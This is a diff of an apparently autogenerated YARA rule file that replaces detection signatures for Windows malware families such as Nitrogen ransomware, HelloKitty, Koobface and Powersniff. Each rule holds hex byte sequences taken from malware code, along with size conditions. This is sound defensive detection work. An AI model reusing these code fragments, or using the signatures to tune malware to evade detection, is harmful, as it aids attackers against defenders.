-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.faketc_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitrogen_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitrogen_ransomware_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "88cb80bbffbb5dd33ed57d116a0c91ab50887b3cc89797bc963aaa34348dde48"
+		logic_hash = "80271e297eab8217b53749d1fda8214698e5eac53c180b085f9fa59013bd1e3e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93713,32 +93902,32 @@ rule MALPEDIA_Win_Faketc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? bd01000000 89ac2460010000 84db 7405 c644246c01 097c2470 }
-		$sequence_1 = { c645fc10 e8???????? 83bdd0fdffff08 720f 8b95bcfdffff 52 e8???????? }
-		$sequence_2 = { e8???????? 83c41c c3 8b4c2424 5f 5e 5d }
-		$sequence_3 = { 8b91f0860000 83c201 8b81f4860000 83d000 8b4d08 8991f0860000 8981f4860000 }
-		$sequence_4 = { e8???????? 83c40c 85c0 740f 8b45f8 c74048ffffffff e9???????? }
-		$sequence_5 = { e8???????? 50 8d85b8060000 50 c645fc0c e8???????? 83c40c }
-		$sequence_6 = { c1ef10 c1ed18 330cad18d45f00 81e7ff000000 2b0cbd18d85f00 8b7808 33f1 }
-		$sequence_7 = { e8???????? 83c40c c744241401000000 89742418 c744241c00000000 83fe08 0f87c2010000 }
-		$sequence_8 = { e8???????? a1???????? 33c4 89842450010000 53 55 8bac2460010000 }
-		$sequence_9 = { e8???????? 83c408 85c0 7473 8b4df0 8b91a8020000 8b45f0 }
+		$sequence_0 = { 83f26c 4183c405 66410f6ed8 4183f569 8b8c2470030000 4183f46c 660f6eca }
+		$sequence_1 = { 83c004 31d0 66898424bc020000 0fb79424be020000 8b8424b0020000 83c005 31d0 }
+		$sequence_2 = { 66898424ae240000 0fb79424b0240000 8b8424a0240000 83c006 31d0 66898424b0240000 0fb79424b2240000 }
+		$sequence_3 = { 4189c3 8b8424a06a0000 83c01b 663305???????? 89c3 8b8424a06a0000 83c01c }
+		$sequence_4 = { 83c20d 8944247c 8b8424204f0000 83f274 89442478 8b8424204f0000 89442474 }
+		$sequence_5 = { 89442428 660fc4cf01 448b8424702a0000 66450fc4cb01 894c2424 4183c107 66410f62c9 }
+		$sequence_6 = { 83f065 668984247a400000 0fb7442420 83c00e 83f072 668984247c400000 31c0 }
+		$sequence_7 = { 440fb73d???????? 0f118c24d0650000 8d680a 0fb705???????? 418d4f0a 440fb73d???????? 8d780a }
+		$sequence_8 = { 6689bc24900a0000 0fb77c245e 6689bc24920a0000 6689b424940a0000 f30f6fac24400a0000 f30f6fa424700a0000 66899c24960a0000 }
+		$sequence_9 = { ff15???????? 8b542440 4889d9 83ca04 ff15???????? 90 4883c468 }
 
 	condition:
-		7 of them and filesize < 6864896
+		7 of them and filesize < 2590720
 }
-rule MALPEDIA_Win_Nikitear_Auto : FILE
+rule MALPEDIA_Win_Ruckguv_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f8fdb193-3c11-59c1-829a-a9eb5f221c83"
+		id = "0458bbf5-faad-51b1-bbf4-5951261d0eab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nikitear"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nikitear_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ruckguv_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "78bbb5bb165f52797af65de0137f35c2d932f8f5aaa20ce84f06a64d8b20f48b"
+		logic_hash = "45b231c70efe5a17389a0b484f9ffc2309c40182fd8d298e6f80ad3ac2eb154c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93752,32 +93941,32 @@ rule MALPEDIA_Win_Nikitear_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d8d60010000 ffd0 33c0 c74424204004242e 8844242c }
-		$sequence_1 = { 8d419f 3c19 7706 448d49b9 eb24 8d41d0 3c09 }
-		$sequence_2 = { 48635708 4c8d3dcce5feff 48035508 0fb60a 83e10f 4a0fbe843908460300 428a8c3918460300 }
-		$sequence_3 = { 488d4c2440 4885f6 743f 4c8d054ff7fdff 483bca 7333 80390d }
-		$sequence_4 = { 4c03f3 4c8b6c2460 4b8d0427 4c3bf0 0f94c0 488b4df8 4833cc }
-		$sequence_5 = { 488d151e570200 488d0de7560200 e8???????? 85c0 7529 }
-		$sequence_6 = { 39b42480000000 747b 4c8d0576ce0100 498b04e8 f644f83848 7441 0fb7442470 }
-		$sequence_7 = { 44884c2420 41b901000000 4533c0 418bd1 488bcb e8???????? 83e73f }
-		$sequence_8 = { 48ffc1 4883f90d 7306 0fb65590 ebea 0fb64591 8bce }
-		$sequence_9 = { 4883c227 482bc1 4883c0f8 4883f81f 772a e8???????? 488b4310 }
+		$sequence_0 = { 750f 56 50 53 }
+		$sequence_1 = { 50 8d4640 50 8d4340 50 }
+		$sequence_2 = { 51 56 8b7508 8b463c 03c6 }
+		$sequence_3 = { ff75fc ffd0 5f 5e 8bc3 5b }
+		$sequence_4 = { a5 a5 66a5 a4 33f6 56 8d453c }
+		$sequence_5 = { ffd0 8d859cfdffff 50 68???????? }
+		$sequence_6 = { 884d13 8a8801010000 33ff 884dff 397d0c 763d 53 }
+		$sequence_7 = { 7908 49 81c900f0ffff 41 0fb7c9 }
+		$sequence_8 = { 57 8d8598fcffff 50 8d85a0feffff 68???????? 50 ff555c }
+		$sequence_9 = { 8d859cfdffff 50 68???????? e8???????? 6814f1f808 }
 
 	condition:
-		7 of them and filesize < 610304
+		7 of them and filesize < 41024
 }
-rule MALPEDIA_Win_Goldenspy_Auto : FILE
+rule MALPEDIA_Win_Hellokitty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a246a47-ca73-52d5-9d24-1b989582e4ce"
+		id = "70edbf2a-39f7-5f31-a1a6-369fa9a6babf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.goldenspy_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hellokitty_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "abc1cc932d348f65dac5bf1d4eeb448d62aaba8c9d68819a9d802639d61024c9"
+		logic_hash = "69c3664f3b1b0dc034046821a230bddd8509bf97c9fd256224c800e384d6c7d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93791,32 +93980,32 @@ rule MALPEDIA_Win_Goldenspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0cbd48b24700 c644112900 837dfc00 7507 }
-		$sequence_1 = { 8bce ff5010 eb2d 8b06 8bce ff501c eb24 }
-		$sequence_2 = { 8bc8 e8???????? 8d4de0 c645fc0c e8???????? }
-		$sequence_3 = { ff75bc 8bcf e8???????? 3bf3 0f85b4feffff b001 }
-		$sequence_4 = { 50 8bcb e8???????? ba01000000 eb0d }
-		$sequence_5 = { e8???????? 84c0 0f84d7000000 8b55c8 8d4dd8 e8???????? c745fc01000000 }
-		$sequence_6 = { 50 8bce c78588fdffff00000000 e8???????? 8b00 3b06 7507 }
-		$sequence_7 = { 51 0f434520 50 51 8d8dccfeffff e8???????? 837d1c10 }
-		$sequence_8 = { 8b08 2bd1 52 eb2b 8b8538ffffff a804 752d }
-		$sequence_9 = { 6a00 50 6802000080 ff15???????? 85c0 7557 }
+		$sequence_0 = { 89542414 3d00010000 0f8f27010000 8bcb e8???????? 8bf0 }
+		$sequence_1 = { 6a08 58 75a4 5b 5f 5e c9 }
+		$sequence_2 = { 50 ffd6 8bd8 8945fc 83c8ff 3bd8 0f846b020000 }
+		$sequence_3 = { 8b45fc 8b4048 f00fc118 4b 7515 8b45fc 817848c0044200 }
+		$sequence_4 = { 03c8 8b45f0 03ce 8b75fc 894df8 c1c105 8b4034 }
+		$sequence_5 = { 8d4c242c e8???????? 837c243c08 8d442428 0f43442428 33ff 57 }
+		$sequence_6 = { 8b7508 2bdf ba10000000 660f1f440000 8a0c06 8d4001 3248ff }
+		$sequence_7 = { 0fb689303b4200 33f9 333d???????? 33fa 8bd7 89b880000000 33d6 }
+		$sequence_8 = { c1c806 33c8 8b45dc 3345e8 034dac 23f0 3375dc }
+		$sequence_9 = { c1c10e 33c8 8bc2 8b55cc 8bf2 c1e803 33c8 }
 
 	condition:
-		7 of them and filesize < 1081344
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Kk_Rat_Auto : FILE
+rule MALPEDIA_Win_Koobface_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d3a867fb-765c-587c-976d-8b832133ea92"
+		id = "26b0388c-a8f9-5f6a-a459-0177fcecc6df"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kk_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kk_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.koobface_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "f46ada63a222e5519816a10f8a2e3c2cfb8e81915e639c45c54d3595ef668e74"
+		logic_hash = "0e852ce8a28d3657fb835380a3e7fdc823e6b573b8d3e8c2631736d136315996"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93830,34 +94019,34 @@ rule MALPEDIA_Win_Kk_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a4510 53 56 8bf1 57 8b7d08 8886d4000000 }
-		$sequence_1 = { 8d85f4fdffff 68???????? 50 e8???????? 8d85f8feffff 50 8d85f4fdffff }
-		$sequence_2 = { bb01000000 8b461c 83782c00 7421 8b4614 3bc2 761a }
-		$sequence_3 = { 7524 a1???????? a3???????? a1???????? c705????????24961010 8935???????? }
-		$sequence_4 = { 51 8b4508 b94d5a0000 66c7004d5a 663908 7404 33c0 }
-		$sequence_5 = { ff15???????? 53 50 8985ecfdffff 899de8fdffff ff15???????? }
-		$sequence_6 = { 741c 8d45cc 50 c745cc0b000000 c745f03ce51210 e8???????? 85c0 }
-		$sequence_7 = { 885dda c78504ffffff5245475f c78508ffffff45585041 c7850cffffff4e445f53 66c78510ffffff5a00 c78574ffffff5245475f c78578ffffff44574f52 }
-		$sequence_8 = { 897dfc 8b3d???????? ffd7 6a01 ff35???????? 8d8dbc60ffff ff35???????? }
-		$sequence_9 = { 8bf1 837e1410 57 7202 8b0e 8b450c }
+		$sequence_0 = { 8d85c8f3ffff 50 ffd6 8d85d8f3ffff 50 c645fc06 ffd6 }
+		$sequence_1 = { 56 e8???????? 59 50 56 8d8f50010000 e8???????? }
+		$sequence_2 = { 50 0fb78538c1ffff 50 ffb534c1ffff 8d85f0e8ffff ffb530c1ffff 68???????? }
+		$sequence_3 = { 6874040000 b8???????? e8???????? 8b4508 }
+		$sequence_4 = { 8bd6 c1fa05 8b1495a0534200 83e61f c1e606 f644320480 7416 }
+		$sequence_5 = { 5e 8bc3 5b 5d c20c00 e9???????? 55 }
+		$sequence_6 = { ff91b4000000 ff75d8 ffd3 8b4514 3bc7 }
+		$sequence_7 = { 50 e8???????? 68???????? 8d850857ffff 50 }
+		$sequence_8 = { 8906 3bc7 7425 6aeb 50 ff15???????? ff750c }
+		$sequence_9 = { ff11 8b45e0 c645fc02 85c0 7406 8b08 50 }
 
 	condition:
-		7 of them and filesize < 3516416
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Qtbot_Auto : FILE
+rule MALPEDIA_Win_Powersniff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b92b0c1-9b29-5389-8e3a-195746a37ab1"
+		id = "2a881adf-7d1a-56c3-b5e7-0d44ba58f640"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qtbot_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powersniff_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "eee36880d1f59f5f14d38b39d151180259128bb7c87bcaf8aa7d62fcdb47e198"
-		score = 60
-		quality = 25
+		logic_hash = "5f0dc4acb7c58a41f657c7beac5f0371e51ded838f8edb6d41966e6195e43ff4"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -93869,38 +94058,32 @@ rule MALPEDIA_Win_Qtbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4510 89450c 8d4301 0fb6d8 8a941dfcfeffff }
-		$sequence_1 = { 33c0 53 8a1a 6bc80d }
-		$sequence_2 = { 0fb6c3 83c0d0 03c1 25ffffff00 42 8a1a }
-		$sequence_3 = { 33f6 8bde 85ff 7455 8b4510 89450c }
-		$sequence_4 = { 84db 75e9 5b 5d }
-		$sequence_5 = { 64a130000000 8b400c 8b7014 ad 8b00 8b4010 }
-		$sequence_6 = { 742a 8b049a 03c6 50 e8???????? 3b4508 740b }
-		$sequence_7 = { 88841dfcfeffff 889435fcfeffff 0fb68c1dfcfeffff 0fb6c2 03c8 8b450c 0fb6c9 }
-		$sequence_8 = { 59 837e04ff 8bd8 8d7e08 7504 8b2f }
-		$sequence_9 = { 53 6a00 6a00 ff15???????? 833e05 7521 }
-		$sequence_10 = { 8d7e08 7504 8b2f eb02 8bef 8b06 83661c00 }
-		$sequence_11 = { eb60 8b46f8 834de4ff 49 c745e8ff000000 8b3c857c300010 }
-		$sequence_12 = { 49 c745e8ff000000 8b3c857c300010 c745ecffff0000 0faff9 83f801 c745f0ffffff00 }
-		$sequence_13 = { 894dfc eb0e 8b14957c300010 49 0fafd1 }
-		$sequence_14 = { 83f807 0f87c7000000 ff24857e230010 832700 e9???????? }
-		$sequence_15 = { e9???????? 33c0 8b7df4 8b0c855c300010 }
+		$sequence_0 = { 8b5dec ff75fc e8???????? 8bd8 3bde }
+		$sequence_1 = { 894df4 33ff eb08 3c0d 7408 47 }
+		$sequence_2 = { c745e04d9b0010 c745e46f910010 c745e8a2910010 c745ec549b0010 c745f0c2910010 }
+		$sequence_3 = { 8b4508 56 be???????? 57 8908 8a03 894dfc }
+		$sequence_4 = { 8975ec 8b75f4 c1ee18 8b34b590740010 }
+		$sequence_5 = { eb12 c745fc08000000 eb09 ff15???????? 8945fc 8b45fc 5f }
+		$sequence_6 = { 33db 43 5e 5f ff75fc ff15???????? ff75f0 }
+		$sequence_7 = { 750f ff15???????? 3de5030000 750d eb09 ff7610 }
+		$sequence_8 = { ff15???????? 8bf8 897df0 3bfb 7435 8d4508 50 }
+		$sequence_9 = { 331cb590840010 c1ea18 8b349590780010 8b55f4 335808 c1ea08 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Derohe_Auto : FILE
+rule MALPEDIA_Win_Scout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4840f450-01b9-530f-9f3a-ae1edecbe97a"
+		id = "e14921fe-74c7-5cda-92ba-67e7cc0f28ef"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.derohe_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scout_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "d33bdd1d4e902dd1e401bdb13051180ed9ff9ef53abcf198b2156206eaf60cc4"
+		logic_hash = "3e6544ff6fee99e30b42c384814b4a00494424215e1f894b7afbd76f2c9391e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93914,32 +94097,32 @@ rule MALPEDIA_Win_Derohe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 8b542404 c6042443 8b02 ffd0 8b542404 c60424c9 }
-		$sequence_1 = { ffd0 8b542404 c604247d 8b02 ffd0 8b542404 c60424b7 }
-		$sequence_2 = { e8???????? 5a 85c0 0f846b050000 8b742428 31c0 8b1f }
-		$sequence_3 = { ffd0 8b542404 c60424fe 8b02 ffd0 8b542404 c6042424 }
-		$sequence_4 = { ffd0 8b542404 c60424d4 8b02 ffd0 8b542404 c6042464 }
-		$sequence_5 = { ffd0 8b542404 c60424ae 8b02 ffd0 8b542404 c6042435 }
-		$sequence_6 = { ff702c ff15???????? 0fb7431c 897318 83e00a 83c410 6683f80a }
-		$sequence_7 = { ffd0 8b542404 c604245f 8b02 ffd0 8b542404 c60424f5 }
-		$sequence_8 = { ffd0 8b542404 c60424ba 8b02 ffd0 8b542404 c60424c5 }
-		$sequence_9 = { e8???????? 8b542414 8b4318 2982d4000000 8b4718 89c1 81e110900000 }
+		$sequence_0 = { 817c243031313131 7445 690d????????60ea0000 ff15???????? 8b0d???????? b867666666 ffc1 }
+		$sequence_1 = { 8d58b0 498bce 448bc3 488d154cac0000 e8???????? 85c0 }
+		$sequence_2 = { 7706 ff15???????? 488364243000 488d0d849f0000 8364242800 41b803000000 4533c9 }
+		$sequence_3 = { 83c8ff eb0b 4803f6 418b84f728950100 }
+		$sequence_4 = { 0f84aa000000 83f81a 0f85eb020000 33ff 488d4c2430 48897c2430 }
+		$sequence_5 = { 488b8d80140000 ff15???????? 488d537c 41b888140000 }
+		$sequence_6 = { 4885c9 750b 488d0d29f10000 48894b48 4963d0 e8???????? }
+		$sequence_7 = { 488d0d36fbfeff 83e03f 458be9 4d03e8 4c8945df 4c8be6 }
+		$sequence_8 = { 488d0dd4f90000 4183e23f 4d03f0 4d8bf8 }
+		$sequence_9 = { 0f84aa000000 83f81a 0f85eb020000 33ff 488d4c2430 48897c2430 e8???????? }
 
 	condition:
-		7 of them and filesize < 35788800
+		7 of them and filesize < 315392
 }
-rule MALPEDIA_Win_Kegotip_Auto : FILE
+rule MALPEDIA_Win_Stegoloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70477c51-c689-59a8-8176-7550acce9ee4"
+		id = "8b6a7b2b-6883-5a49-84ad-5eb99ca2dffd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kegotip_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stegoloader_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "da81d78c4e1182921c0ea815e9750dcd5bacf467108d0f772088273b021761e1"
+		logic_hash = "0fc5c31b9f64d477e89b80a8b4c8cba676e173d514623e0201d322a0680fd5e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93953,32 +94136,38 @@ rule MALPEDIA_Win_Kegotip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb04 33c0 eb6d e9???????? eb63 }
-		$sequence_1 = { 85c9 740b 8b5508 0355f8 8955fc eb02 ebbb }
-		$sequence_2 = { 8b450c 50 8d8df8feffff 51 e8???????? 83c408 c785a8fcffff80000000 }
-		$sequence_3 = { 0f840c010000 6a00 6a00 6a03 6a00 6a00 6a50 }
-		$sequence_4 = { 0fb64df7 85c9 7504 32c0 eb38 c645f700 }
-		$sequence_5 = { 3b5588 7d1e 8b4508 038578ffffff 0fbe4801 }
-		$sequence_6 = { ff5510 83c408 0fb6c8 85c9 7504 32c0 eb07 }
-		$sequence_7 = { 6a00 6800000080 8d95d8feffff 52 ff15???????? 8945e4 837de4ff }
-		$sequence_8 = { 32c0 e9???????? 68???????? e8???????? 83c404 68???????? }
-		$sequence_9 = { 3b4dfc 7324 8b5510 0355e4 8b45f4 0345f8 }
+		$sequence_0 = { 759d 8b043e 0345fc eb03 }
+		$sequence_1 = { 51 51 8b4514 8b4d18 53 56 57 }
+		$sequence_2 = { 8d4b01 40 57 894c2414 89442410 8d4c2410 }
+		$sequence_3 = { 881e 8811 0fb68801010000 0fb69000010000 8a0c01 020c02 8b55fc }
+		$sequence_4 = { 897dfc 8bf7 3bf7 743a 8bce }
+		$sequence_5 = { 50 8d45f0 50 53 53 ff75f8 e8???????? }
+		$sequence_6 = { 8945f0 894dfc 394dfc 753c 394e18 }
+		$sequence_7 = { 8bd3 e8???????? 03f3 59 8945f4 85c0 }
+		$sequence_8 = { 2b4c2408 8b542414 8a09 ff442414 48 880a }
+		$sequence_9 = { 895e04 895e08 895e0c 7611 53 }
+		$sequence_10 = { ff7108 e8???????? c3 56 8bf1 e8???????? f644240801 }
+		$sequence_11 = { 49 49 51 ff7004 8b4f04 }
+		$sequence_12 = { ff442414 48 880a 75e9 eb5b 83e803 eb02 }
+		$sequence_13 = { 8bf8 33f6 8b1c3e 6a40 83c604 8b043e }
+		$sequence_14 = { 83ceff 394c240c 7629 57 8b44240c 0fb61401 6a08 }
+		$sequence_15 = { c645ff00 8bc8 8bc7 f7f1 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 802816
 }
-rule MALPEDIA_Win_Bangat_Auto : FILE
+rule MALPEDIA_Win_Ice_Ix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "05c414bb-9422-5f0e-974d-c56fdab166b4"
+		id = "923bfba5-fc64-5bcc-9e18-fd2e69647e54"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bangat_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ice_ix_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "5cb16644073e6088f8c102fdd3bad27fec482e34ef437064c8f923550a4b4259"
+		logic_hash = "88c417db4270d272cced0c61349b1fd36aad8c36a3945176ae9dc99a2eba0afc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93992,32 +94181,32 @@ rule MALPEDIA_Win_Bangat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d45fc 50 e8???????? 8b4508 8325????????00 83c418 }
-		$sequence_1 = { 3bc7 7d02 8bc7 50 ff75d8 68???????? 56 }
-		$sequence_2 = { 8a8888f44000 ff248d30f44000 8b5e6c 5f 8bc3 5e 5b }
-		$sequence_3 = { 33c9 8a4c2432 8a9950ec4700 33c9 8aa850ec4700 8bfb }
-		$sequence_4 = { 6859020000 68???????? 68fc000000 6a77 6a14 e8???????? }
-		$sequence_5 = { 8b348d50e84700 33c6 8d7720 8bbff0000000 33c5 d1ff 4f }
-		$sequence_6 = { 83c40c 6a0a 53 53 8d45f4 53 }
-		$sequence_7 = { ff15???????? 85c0 742d 8d85d4feffff 50 8d85d4f5ffff 68???????? }
-		$sequence_8 = { 895c2424 897c2428 e8???????? 83c414 e8???????? 53 }
-		$sequence_9 = { 85c0 749b 6803002e00 6a00 6812030000 68ffff0000 }
+		$sequence_0 = { e8???????? 56 6a47 8945f0 }
+		$sequence_1 = { 8db508ffffff 58 e8???????? 6a63 8d7598 58 e8???????? }
+		$sequence_2 = { 6a08 6a00 8d45f4 50 e8???????? 8db5d8feffff b89b000000 }
+		$sequence_3 = { 6a2d 58 e8???????? ff75d0 ff15???????? }
+		$sequence_4 = { 85ff 0f8403020000 8a1408 80fa0d }
+		$sequence_5 = { 833d????????04 8b7c2414 1bc0 f7d8 68cc000000 83c034 e8???????? }
+		$sequence_6 = { 6a3f 8d75b8 58 e8???????? 8b4df4 8bc6 50 }
+		$sequence_7 = { c20400 55 8bec 83ec20 56 6a5c }
+		$sequence_8 = { 741d 48 7416 83e80b 740d 83e805 7404 }
+		$sequence_9 = { 57 ff15???????? 8b4640 3bc3 0f84a8000000 6800000010 68254e0000 }
 
 	condition:
-		7 of them and filesize < 1228800
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Unidentified_041_Auto : FILE
+rule MALPEDIA_Win_Nevada_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9647b3bf-4e79-5038-aba8-fe9b062b7eaf"
+		id = "d851b978-3df8-538e-b0a6-f5a42a4c41f2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_041_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nevada"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nevada_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ad11b25191c5069b1a65640fe7bbe0cd58f54821b3d55fbf4025b9ccae632082"
+		logic_hash = "5d586f59dca860d1839b19790bc7f7be57e580648d77868dbbba465dd7726682"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94031,34 +94220,34 @@ rule MALPEDIA_Win_Unidentified_041_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8913 8b4dfc 8bc3 5f 5e 33cd 5b }
-		$sequence_1 = { 668945be 59 668b440dbc 6603440ddc 6689440dbe 83c102 83f91e }
-		$sequence_2 = { ff7508 57 53 ff15???????? 83f8ff 74c4 eb03 }
-		$sequence_3 = { 5d c20800 8325????????00 c3 55 8bec 8b4508 }
-		$sequence_4 = { 85ff 7428 3bf9 741c 8b75f8 8bd9 6a00 }
-		$sequence_5 = { 8d4dc4 c645fc00 e8???????? 8b4dec 6a18 58 03c8 }
-		$sequence_6 = { ff7508 68???????? 6a40 50 e8???????? 83c414 8d8578ffffff }
-		$sequence_7 = { 57 33db 53 ff15???????? 85c0 7552 ff15???????? }
-		$sequence_8 = { 72ee 81fbffffff7f 76e6 57 53 8d4dc0 e8???????? }
-		$sequence_9 = { 5d c20400 6a1c b8???????? e8???????? 8bf1 33db }
+		$sequence_0 = { 4889ea e8???????? 0f0b 4c8d0515c10200 ba00100000 4889e9 e8???????? }
+		$sequence_1 = { 4d89f8 664585e4 0f8597feffff e9???????? 4981fe01010000 0f834a010000 0f57c0 }
+		$sequence_2 = { e8???????? 4c8da42450020000 4c89e1 4889fa 4d89f8 e8???????? 488db42478020000 }
+		$sequence_3 = { 4839ce 74c4 803ea0 72bf eb3e 4839ce 4889d7 }
+		$sequence_4 = { 438a443cff 3c2f 7438 3c5c 7434 e9???????? 41813f5c5c3f5c }
+		$sequence_5 = { 415f c3 4c8d642430 488dac24b0000000 eb26 488b8424c0000000 48035c2420 }
+		$sequence_6 = { 4080fd02 0f8510010000 488d6901 4c39c5 0f83fe000000 803c2abf b301 }
+		$sequence_7 = { 0f821affffff 8b442428 4189442434 8a442427 4188442438 31ed e9???????? }
+		$sequence_8 = { 48837f1000 0f859c010000 4d89c4 4989d7 488d4710 488945e8 48c74710ffffffff }
+		$sequence_9 = { 4c8d3559910200 4c39c9 7317 0f1f840000000000 4885db 740a 803c0b45 }
 
 	condition:
